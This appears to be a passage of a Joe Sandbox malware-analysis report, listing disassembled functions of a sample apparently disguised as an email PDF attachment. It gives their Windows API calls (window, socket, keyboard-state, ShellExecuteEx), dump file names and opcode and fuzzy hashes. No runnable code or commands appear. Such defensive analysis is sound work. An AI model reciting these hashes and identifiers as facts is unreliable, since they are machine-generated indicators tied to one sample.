                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconLoad
                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                          • API String ID: 2457776203-404129466
                                                                                                          • Opcode ID: 817ccff5f7b1554625c947b7405539d19d8d804e2378af03ad1c953e80897d0c
                                                                                                          • Instruction ID: 6a9f2745ca0a9eb1567988d7bab3f578990ccd98a8213f2ade4e86d1ca62f66b
                                                                                                          • Opcode Fuzzy Hash: 817ccff5f7b1554625c947b7405539d19d8d804e2378af03ad1c953e80897d0c
                                                                                                          • Instruction Fuzzy Hash: B5112B3134C346FEEB14AB54DC86EEB779CDF19360B10402AF914A62C2DBBC6F8155A4
                                                                                                          Function 007B42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007B4312
                                                                                                          • LoadStringW.USER32(00000000), ref: 007B4319
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007B432F
                                                                                                          • LoadStringW.USER32(00000000), ref: 007B4336
                                                                                                          • _wprintf.LIBCMT ref: 007B435C
                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007B437A
                                                                                                          Strings
                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 007B4357
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                          • API String ID: 3648134473-3128320259
                                                                                                          • Opcode ID: 97f0892134ff938597f00ce6be63ce1526a97dea42eb9b0f4ee63db8b5e3e700
                                                                                                          • Instruction ID: b362c97f36d189b1be5f41e48639cf87e025a79be486458db5799528915eb0b4
                                                                                                          • Opcode Fuzzy Hash: 97f0892134ff938597f00ce6be63ce1526a97dea42eb9b0f4ee63db8b5e3e700
                                                                                                          • Instruction Fuzzy Hash: DC014FF2901208BFE75197A4DD89EE6777CEB08301F0085A2F74AE2051EA799E854B74
                                                                                                          Function 007DD43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 007DD47C
                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 007DD49C
                                                                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007DD6D7
                                                                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007DD6F5
                                                                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007DD716
                                                                                                          • ShowWindow.USER32(00000003,00000000), ref: 007DD735
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 007DD75A
                                                                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 007DD77D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1211466189-0
                                                                                                          • Opcode ID: a98166fb7e923271caa9a7b143a314b9bfae7f59924583a8a750ff0e118841b1
                                                                                                          • Instruction ID: 301b0817f3e5711c1eeb92faf5d7ce069f2e1c580e1ce10410aa10897915e93b
                                                                                                          • Opcode Fuzzy Hash: a98166fb7e923271caa9a7b143a314b9bfae7f59924583a8a750ff0e118841b1
                                                                                                          • Instruction Fuzzy Hash: CCB18971600225EBDF24CF68C9857A97BB1FF08711F08C0AAED499B295D778AD50CBA0
                                                                                                          Function 00752A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0078C1C7,00000004,00000000,00000000,00000000), ref: 00752ACF
                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0078C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00752B17
                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0078C1C7,00000004,00000000,00000000,00000000), ref: 0078C21A
                                                                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0078C1C7,00000004,00000000,00000000,00000000), ref: 0078C286
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ShowWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1268545403-0
                                                                                                          • Opcode ID: ac2e2bc3bae665e6e506103defd53602d868fa475c13ad424906e59310dfeca1
                                                                                                          • Instruction ID: 2c8e61d320a0ded6cf51f46ab3c2ed81692c875bfa978b1a7c71db0c26ef419e
                                                                                                          • Opcode Fuzzy Hash: ac2e2bc3bae665e6e506103defd53602d868fa475c13ad424906e59310dfeca1
                                                                                                          • Instruction Fuzzy Hash: 8141DE31604680EAD7369B288C8CBEB7B95BB47311F54C41DED4786562C6BD984FD720
                                                                                                          Function 007B70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 007B70DD
                                                                                                            • Part of subcall function 00770DB6: std::exception::exception.LIBCMT ref: 00770DEC
                                                                                                            • Part of subcall function 00770DB6: __CxxThrowException@8.LIBCMT ref: 00770E01
                                                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007B7114
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 007B7130
                                                                                                          • _memmove.LIBCMT ref: 007B717E
                                                                                                          • _memmove.LIBCMT ref: 007B719B
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 007B71AA
                                                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007B71BF
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 007B71DE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                          • String ID:
                                                                                                          • API String ID: 256516436-0
                                                                                                          • Opcode ID: f672c31e4f69ba7849d74945c051ac966153d73e6433dafc024ebadcd8b5a80c
                                                                                                          • Instruction ID: 4cfbac2200c34bd5371541dd0c1c23c80a71a2666799a2d1951945fceae4bbc2
                                                                                                          • Opcode Fuzzy Hash: f672c31e4f69ba7849d74945c051ac966153d73e6433dafc024ebadcd8b5a80c
                                                                                                          • Instruction Fuzzy Hash: 01315271900209EBCF10EFA4DC89AAE7778FF85710F1481A5F9049B256D7789E10CBA4
                                                                                                          Function 007D61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DeleteObject.GDI32(00000000), ref: 007D61EB
                                                                                                          • GetDC.USER32(00000000), ref: 007D61F3
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007D61FE
                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 007D620A
                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007D6246
                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007D6257
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007D902A,?,?,000000FF,00000000,?,000000FF,?), ref: 007D6291
                                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007D62B1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3864802216-0
                                                                                                          • Opcode ID: 094565adda403da859073252ecb42b16d222aa304ec6c8d51613a4ca3c263119
                                                                                                          • Instruction ID: 3706e5aff204bb78864eaca1bd986fc4e22c9bd7bf0c7033fc6b8d262b1b9a90
                                                                                                          • Opcode Fuzzy Hash: 094565adda403da859073252ecb42b16d222aa304ec6c8d51613a4ca3c263119
                                                                                                          • Instruction Fuzzy Hash: F8314B72201214BFEB118F54CC8AFEA3BB9EF49765F048066FE099A291D6799841CB64
                                                                                                          Function 007ABBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 2931989736-0
                                                                                                          • Opcode ID: 6405796b30eeff1422f7b751e33e3bd21dee1d8af346262282953cc0dab330c3
                                                                                                          • Instruction ID: 06dcdcfacb8b2c1226dca492ad44f9425b21f49161ab262822a6ae850c12807c
                                                                                                          • Opcode Fuzzy Hash: 6405796b30eeff1422f7b751e33e3bd21dee1d8af346262282953cc0dab330c3
                                                                                                          • Instruction Fuzzy Hash: 0121F9F1702245BBE70466269D42FFB735DAE96398F448120FD0896683FB1CDE11C2B1
                                                                                                          Function 007BEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                            • Part of subcall function 0076FC86: _wcscpy.LIBCMT ref: 0076FCA9
                                                                                                          • _wcstok.LIBCMT ref: 007BEC94
                                                                                                          • _wcscpy.LIBCMT ref: 007BED23
                                                                                                          • _memset.LIBCMT ref: 007BED56
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                          • String ID: X
                                                                                                          • API String ID: 774024439-3081909835
                                                                                                          • Opcode ID: 476108360bef0577f670d44f15b9da2b22eef6149d92dd620d0eb81b2b47a910
                                                                                                          • Instruction ID: a45d84a60a4245fd76d8469e62bebc821d4cdc951b73c1e556064d9557a6abc6
                                                                                                          • Opcode Fuzzy Hash: 476108360bef0577f670d44f15b9da2b22eef6149d92dd620d0eb81b2b47a910
                                                                                                          • Instruction Fuzzy Hash: C9C17D70508700DFD754EF24C849AEAB7E4AF85310F04492DF999973A2DB78EC49CB92
                                                                                                          Function 007C6B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 007C6C00
                                                                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007C6C21
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 007C6C34
                                                                                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 007C6CEA
                                                                                                          • inet_ntoa.WSOCK32(?), ref: 007C6CA7
                                                                                                            • Part of subcall function 007AA7E9: _strlen.LIBCMT ref: 007AA7F3
                                                                                                            • Part of subcall function 007AA7E9: _memmove.LIBCMT ref: 007AA815
                                                                                                          • _strlen.LIBCMT ref: 007C6D44
                                                                                                          • _memmove.LIBCMT ref: 007C6DAD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                          • String ID:
                                                                                                          • API String ID: 3619996494-0
                                                                                                          • Opcode ID: ad6e1b46698717ffedf42f8d650d6640ee2110fbf2612f75ba2349017529f84f
                                                                                                          • Instruction ID: 016308b0ec3a8affbcdaa1fb683abd397d3f1804982636e9ecc74e6ffd319d86
                                                                                                          • Opcode Fuzzy Hash: ad6e1b46698717ffedf42f8d650d6640ee2110fbf2612f75ba2349017529f84f
                                                                                                          • Instruction Fuzzy Hash: F081D471204300EBD710EF24CC89FAAB7E8AF84714F14491DF9569B292DBB8ED04CB92
                                                                                                          Function 00751424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 78906a2aaed1082391cc1d5eaafcadb6bbad9d6aeebc8e42cf31d37e38345db0
                                                                                                          • Instruction ID: 16f62a135661b4ee7d65f9d3a30dd06071ef6ef2bbf2983d3d45d1f7590998f3
                                                                                                          • Opcode Fuzzy Hash: 78906a2aaed1082391cc1d5eaafcadb6bbad9d6aeebc8e42cf31d37e38345db0
                                                                                                          • Instruction Fuzzy Hash: 9D718A30900109EFCB04DF98CC89AFEBB79FF85312F648159F915AA251D778AA15CBA4
                                                                                                          Function 007DB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsWindow.USER32(00E55C18), ref: 007DB3EB
                                                                                                          • IsWindowEnabled.USER32(00E55C18), ref: 007DB3F7
                                                                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007DB4DB
                                                                                                          • SendMessageW.USER32(00E55C18,000000B0,?,?), ref: 007DB512
                                                                                                          • IsDlgButtonChecked.USER32(?,?), ref: 007DB54F
                                                                                                          • GetWindowLongW.USER32(00E55C18,000000EC), ref: 007DB571
                                                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007DB589
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                          • String ID:
                                                                                                          • API String ID: 4072528602-0
                                                                                                          • Opcode ID: c7a4ea791116d35935bbd19a9ff3f3cc66ae890f6247e2c2b9671d311c121d35
                                                                                                          • Instruction ID: bf03501fdfa82f0569a093f059d12312dd37a3a9195b293958d6ddea2f99eedd
                                                                                                          • Opcode Fuzzy Hash: c7a4ea791116d35935bbd19a9ff3f3cc66ae890f6247e2c2b9671d311c121d35
                                                                                                          • Instruction Fuzzy Hash: 6471AD34605244EFDB21DFA4C894FFA7BB9FF49300F15806AEA46973A2C739A950DB50
                                                                                                          Function 007CF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007CF448
                                                                                                          • _memset.LIBCMT ref: 007CF511
                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 007CF556
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                            • Part of subcall function 0076FC86: _wcscpy.LIBCMT ref: 0076FCA9
                                                                                                          • GetProcessId.KERNEL32(00000000), ref: 007CF5CD
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007CF5FC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                          • String ID: @
                                                                                                          • API String ID: 3522835683-2766056989
                                                                                                          • Opcode ID: 45d7330e613e30c90dc9b9dc548758498b6b27bef13ca4d6568defdfbc4ba021
                                                                                                          • Instruction ID: 21634f8f11953b282e5500912aac8441270ba515c1471b4cefedab4780d20c9a
                                                                                                          • Opcode Fuzzy Hash: 45d7330e613e30c90dc9b9dc548758498b6b27bef13ca4d6568defdfbc4ba021
                                                                                                          • Instruction Fuzzy Hash: 3461AD75A00619DFCB14DF64C885AAEBBB5FF49310F14806DE81AAB351CB78AE45CB90
                                                                                                          Function 007B0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetParent.USER32(?), ref: 007B0F8C
                                                                                                          • GetKeyboardState.USER32(?), ref: 007B0FA1
                                                                                                          • SetKeyboardState.USER32(?), ref: 007B1002
                                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 007B1030
                                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 007B104F
                                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 007B1095
                                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007B10B8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                          • String ID:
                                                                                                          • API String ID: 87235514-0
                                                                                                          • Opcode ID: 4362735814fc2240f4c67b52c8a6f3840796f7b89b0e8e781370e469bb630c22
                                                                                                          • Instruction ID: b1591e7e2e58eef3532288277df547a829f8adbc7baf5012d120010e29971b99
                                                                                                          • Opcode Fuzzy Hash: 4362735814fc2240f4c67b52c8a6f3840796f7b89b0e8e781370e469bb630c22
                                                                                                          • Instruction Fuzzy Hash: 7251E3606047D57DFB3652388C29BF7BFA96B06304F888589E1D5468C2C29CDCD4D751
                                                                                                          Function 007B0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetParent.USER32(00000000), ref: 007B0DA5
                                                                                                          • GetKeyboardState.USER32(?), ref: 007B0DBA
                                                                                                          • SetKeyboardState.USER32(?), ref: 007B0E1B
                                                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007B0E47
                                                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007B0E64
                                                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007B0EA8
                                                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007B0EC9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$KeyboardState$Parent
